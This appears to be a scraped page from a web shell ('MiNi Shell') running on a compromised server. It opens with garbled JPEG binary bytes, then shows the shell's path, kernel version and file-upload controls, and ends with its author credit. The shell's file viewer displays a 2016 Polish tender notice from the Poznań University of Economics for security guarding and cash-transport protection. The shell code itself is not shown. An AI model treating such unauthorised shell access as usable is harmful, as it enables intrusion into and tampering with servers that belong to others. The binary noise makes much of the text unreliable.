JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160506/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20160506/50313-N-2016.html

<p class="kh_header"><b>Poznań: Ochrona osób i mienia Uniwersytetu Ekonomicznego w Poznaniu</b><br>
<b>Numer ogłoszenia: 50313 - 2016; data zamieszczenia: 06.05.2016</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Uniwersytet Ekonomiczny w Poznaniu , al. Niepodległości 10, 61-875 Poznań, woj. wielkopolskie, tel. 061 8569000, 8569500, faks 061 8543988.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ae.poznan.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Uczelnia publiczna.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Ochrona osób i mienia Uniwersytetu Ekonomicznego w Poznaniu.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest:
	Ochrona budynków dydaktycznych Uniwersytetu Ekonomicznego w Poznaniu,  przez                                   pracowników  ochrony fizycznej wpisanych na listę kwalifikowanych pracowników ochrony   fizycznej,   a w szczególności:
a)	zapewnienie bezpieczeństwa osób przebywających w budynkach
b)	ochrona mienia w obiektach przed kradzieżą, włamaniem oraz w przypadku pożaru, zalania i innych awarii i zdarzeń losowych
c)	ochrona parkingów w budynku Collegium Altum, Centrum Edukacyjnego Usług Elektronicznych  oraz zamkniętych podwórzach budynków  A i B, koordynacja ruchu osób korzystających z wind osobowych w budynku Collegium Altum, ewidencjonowanie   wjeżdżających i wyjeżdżających  pojazdów  na  podwórze budynków A i B 
d)	ochrona kasjerki i mienia podczas transportu samochodowego środków pieniężnych pomiędzy budynkiem A Poznań, al. Niepodległości 10, a 4 Oddziałem BZ WBK S.A. ul. Powstańców Wlkp. 16 oraz pracownika Biblioteki Głównej UEP i mienia podczas transportu samochodowego środków pieniężnych pomiędzy   budynkiem Collegium Altum ul. Powstańców Wlkp.16, a budynkiem A Poznań, al. Niepodległości 10.                 W obu przypadkach samochód osobowy po stronie Wykonawcy.
   Ochrona budynków domów studenckich Uniwersytetu Ekonomicznego w Poznaniu  w postaci: 
a)	monitorowania alarmowej sygnalizacji włamania i napadu w Domach Studenckich Atol, Dewizka i Feniks 
b)	w przypadku zgłoszenia przez dom studencki sygnału alarmowego - ochrony bezpośredniej obiektu poprzez uruchomienie grupy interwencyjnej natychmiastowej reakcji, podejmującej czynne działania niezwłocznie, nie później jednak niż w ciągu 20 minut od zgłoszenia.   
  Ochronie podlegają osoby, mienie w obiektach oraz same budynki położone w Poznaniu:
a)	Collegium Altum przy ul. Powstańców Wlkp. 16 z parkingiem
b)	Collegium Linguisticum przy ul. Taczaka 9 SPNJO
c)	Budynek Centrum Edukacyjnego Usług Elektronicznych przy ul. Towarowej 55 z parkingiem
d)	Budynki A i B przy al. Niepodległości 10-12
e)	Budynek C przy ul. Towarowej 53 z podwórzem
f)	Parkingi na podwórzach budynków A, B. 
Monitorowanie sygnalizacji włamania i napadu, a w przypadku zgłoszenia przez dom studencki sygnału alarmowego ochronie bezpośredniej obiektu poprzez uruchomienie grupy interwencyjnej podlegają Domy Studenckie położone w Poznaniu:
a)	Atol przy ul. Andrzejewskiego 11 17
b)	Dewizka przy ul. Dożynkowej 9d 
c)	Feniks przy ul. Dożynkowej 9f 
	Ochronę należy realizować w sposób następujący:
a)	Collegium Altum przez cały rok
- w dni robocze - od poniedziałku do piątku
  całodobowo -  1 pracownik ochrony
                         w godz. 16.00 - 20.00  -  1 pracownik ochrony ochrona parkingu
-  w soboty, niedziele i święta 	
   całodobowo -  1 pracownik ochrony
b)	Collegium Linguisticum w okresie od października do czerwca
w dni robocze -  od poniedziałku do piątku		
w godz. 9.00 - 17.00  -  1 pracownik ochrony
-  w soboty i niedziele  w które odbywają się zajęcia 
w godz. 8.00 - 16.00  -  1 pracownik ochrony
Ochrona nie jest realizowana w miesiącach: lipcu, sierpniu i wrześniu oraz w dni wolne od zajęć wykładowych.
c)	Budynek Centrum Edukacyjnego Usług Elektronicznych przy ul. Towarowej 55  wraz  z parkingiem
-  w dni robocze - od poniedziałku do piątku oraz soboty, niedziele i święta 
   całodobowo -  1 pracownik ochrony
d)	Budynki A, B, C 
       -  w dni robocze od poniedziałku do piątku w okresie od października do czerwca
   w godz. 7.00 - 15. 00  -  1 pracownik ochrony  bud.  A, B, C
   w godz. 15.00 - 7.00   -  2 pracowników ochrony  bud. A, B, C 
-  w soboty, niedziele i święta oraz okres wakacyjny (miesiące VII, VIII, IX) 
   całodobowo -  2 pracowników ochrony bud. A, B, C
e) ochrona kasjerki UEP i mienia podczas transportu samochodowego środków pieniężnych w dni robocze w godzinach porannych pomiędzy budynkiem A Poznań, al. Niepodległości 10, a        4 Oddziałem BZ WBK S.A. ul. Powstańców Wlkp. i z 4 Oddziału BZ WBK do budynku A wg zgłoszeń kasjerki następujących w dniu poprzedzającym konwój (ok. 5 konwojów miesięcznie) oraz ochrona pracownika Biblioteki podczas transportu samochodowego środków pieniężnych w dzień roboczy w godz. 10.00-13.00 (1 konwój w miesiącu pod koniec miesiąca) na trasie  budynek Collegium Altum ul. Powstańców Wlkp. 16 - budynek A Poznań, al. Niepodległości 10 wg zgłoszeń pracownika Biblioteki następujących w dniu poprzedzającym konwój. Łączna ilość ok.  80 konwojów w roku. 
Do obowiązków Wykonawcy w zakresie monitorowania lokalnych systemów alarmowych w Domach Studenckich , całodobowo należeć będzie:
a)	monitorowanie sygnałów alarmowych,
b)	w przypadku wyemitowania sygnału alarmowego podjęcie interwencji przez grupę interwencyjną 
c)	po wykonaniu interwencji - nadzorowanie domu studenckiego do chwili przybycia upoważnionego przedstawiciela lub i policji
d)	Wykonawca zapewni odpowiednie urządzenia do przekazywania sygnałów alarmowych (pilot napadowy, system napadowy lub inny o podobnym charakterze) wraz z okablowaniem, a także zapewni ich konserwację oraz naprawy w razie awarii 
e)	Zamawiający zastrzega sobie prawo do jednego alarmu  sprawdzającego w skali miesiąca w każdym z akademików oraz odwołania alarmu w ciągu 5 minut od wysłania sygnału 

Przez cały okres obowiązywania umowy Wykonawca zobowiązany jest posiadać ubezpieczenie od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej  1 000.000,00 zł (w tym wszelkie limity i podlimity)na jedno i wszystkie zdarzenia w okresie ubezpieczenia. W wymaganym zakresie ubezpieczenia (związanym z przedmiotem zamówienia) kwota udziałów własnych, franszyz redukcyjnych itp. nie może być większa niż 5000,00 zł. 
Ocenie podlegać będzie  kopia aktualnej polisy (polis) ubezpieczeniowej wraz z dokumentem potwierdzającym, iż polisa jest aktualnie opłacona.
Klauzula społeczna
Realizowana jest poprzez kryterium wyboru ofert  promującym -  zgodnie z art. 29 ust. 4 .1 a)  ustawy Pzp zatrudnienie przez Wykonawcę,  na podstawie umowy o pracę w pełnym wymiarze pracy -  co najmniej jednej osoby bezrobotnej o której mowa w przepisach o promocji zatrudnienia i instytucjach rynku pracy,(na podstawie skierowania wydanego przez urząd pracy.)
Wykonawca, który w ofercie zobowiązał się do zatrudnienia  na podstawie umowy o pracę w pełnym wymiarze pracy -  osoby osób bezrobotnej, o których mowa w przepisach o promocji zatrudnienia i instytucjach rynku pracy,(na podstawie skierowania wydanego przez urząd pracy) zobowiązany będzie w termie 14 dni od daty rozpoczęcia obowiązywania  umowy do  przedstawienia dokumentu potwierdzającego zatrudnienie ww. osoby lub osób. 
W przypadku złożenia w ofercie  deklaracji zatrudnienia określonej liczby osób wykonawca będzie zobowiązany przestrzegać tego zobowiązania w całym okresie  realizacji zamówienia pod rygorem zastosowania przez Zamawiającego kar umownych przewidzianych za nienależyte  wykonanie zamówienia.
W celu weryfikacji realizacji zobowiązania, o którym mowa powyżej  Wykonawca   będzie także zobowiązany do comiesięcznego raportowania stanu zatrudnienia osoby  osób, o których mowa powyżej, przez cały okres realizacji zamówienia , w terminie  do 10 dnia każdego miesiąca. 
Na każde  żądanie przez Zamawiającego, w terminie do 2 dni roboczych i  w formie przez Zamawiającego określonej, Wykonawca jest zobowiązany udzielić wyjaśnień dotyczących zatrudnienia osób, o których mowa  powyżej. W uzasadnionych przypadkach, z przyczyny  nie leżącej po stronie Wykonawcy, możliwe jest zastąpienie ww. osoby lub osób, inną osobą, pod warunkiem, że spełnione zostaną wszystkie powyższe wymagania  (co do kategorii osób, co do zatrudnienia na okres realizacji zamówienia, w pełnym wymiarze czasu pracy, na podstawie skierowania  wydanego przez urząd pracy)..</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 79.71.00.00-4, 60.10.00.00-9, 79.71.10.01-1.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 23.06.2017.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 9.1.	Wykonawca przystępujący do przetargu, obowiązany jest wnieść wadium w terminie do dnia 16 maja 2016 r., godz. 08:00 - w wysokości: 7 500,00 zł (słownie: siedem tysięcy pięćset złotych  00/100). Wadium należy  wnieść przed upływem terminu składania ofert w jednej lub kilku formach wskazanych w art. 45 ust. 6  ustawy Pzp.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, gdy Wykonawca wykaże, iż  posiada aktualną koncesję dotyczącą świadczenia usług ochroniarskich  wydaną  na podstawie ustawy o ochronie osób i mienia  oraz ustawy o swobodzie działalności gospodarczej.
          Ocenie podlegać będzie kopia aktualnej koncesji.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony, gdy Wykonawca przedstawi wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych  głównych usług w okresie ostatnich  trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie: wykonawca spełni ten warunek, jeżeli wykaże że w ww okresie wykonał co najmniej jedną  usługę ochrony obiektów użyteczności publicznej (z wyjątkiem obiektów służących wyłącznie celom produkcyjnym) o wartości minimum 300 000,00 zł brutto (obejmuje również wykonanie zlecenia w charakterze podwykonawcy).
Ocenie podlegać będzie wykaz usług o którym mowa w pkt.8.1.3.SIWZ i załączone dowody potwierdzające, iż usługi te zostały wykonane lub są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Warunek zostanie spełniony, gdy Wykonawca potwierdzi:
- dysponowanie środkami łączności,
Ocenie podlegać będzie wykaz o którym mowa w pkt.8.1.4.SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dysponują odpowiednim potencjałem technicznym oraz osobami zdolnymi do wykonania zamówienia:
Warunek zostanie spełniony, gdy Wykonawca potwierdzi:

- dysponowanie grupą interwencyjną. 
Ocenie podlegać będzie wykaz o którym mowa w pkt.8.1.5.SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, gdy Wykonawca wykaże, iż  posiada  opłaconą polisę , a w przypadku jej braku inny dokument potwierdzający, iż wykonawca jest ubezpieczony od odpowiedzialności cywilnej deliktowej i kontraktowej w zakresie  prowadzonej działalności związanej z przedmiotem zamówienia na sumę co najmniej  1 000.000,00 zł (w tym wszelkie limity i podlimity)na jedno i wszystkie zdarzenia w okresie ubezpieczenia. W wymaganym zakresie ubezpieczenia (związanym z przedmiotem zamówienia) kwota udziałów własnych, franszyz redukcyjnych itp. nie może być większa niż 5000,00 zł. 
            Ocenie podlegać będzie  kopia aktualnej polisy ubezpieczeniowej wraz z dokumentem potwierdzającym, iż polisa jest aktualnie opłacona.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na zasoby innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>8.3.1	Wypełniony i podpisany formularz oferty - załącznik nr 1 
8.3.2	Wypełniony i podpisany formularz cenowy z cenami jednostkowymi - załącznik nr 9 
8.3.3	Oświadczenie, potwierdzające, ze osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają wymagane uprawnienia - załącznik nr 8
8.3.4	Dowód wniesienia wadium. W przypadku wniesienia wadium w innej formie niż pieniądze należy w ofercie złożyć kopię dokumentu, a oryginał dostarczyć w miejscu składania ofert do końca terminu składania ofert.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Zatrudnienie przez Wykonawcę, na podstawie umowy o pracę w pełnym wymiarze pracy - 2 lub więcej osób bezrobotnych - 10</li>
<li>3 - Czas dojazdu grupy interwencyjnej na miejsce zdarzenia - 5</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://ue.poznan.pl/pl/wspolpraca,c10/zamowienia-publiczne,c115/ogloszenia,c127/<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Uniwersytet Ekonomiczny w Poznaniu 
	61-875 Poznań, al. Niepodległości 10 
pokój nr 107 bud. B.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.05.2016 godzina 08:00, miejsce: Uniwersytet Ekonomiczny w Poznaniu 
	61-875 Poznań, al. Niepodległości 10 
KANCELARIA pokój nr 016 bud. B.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com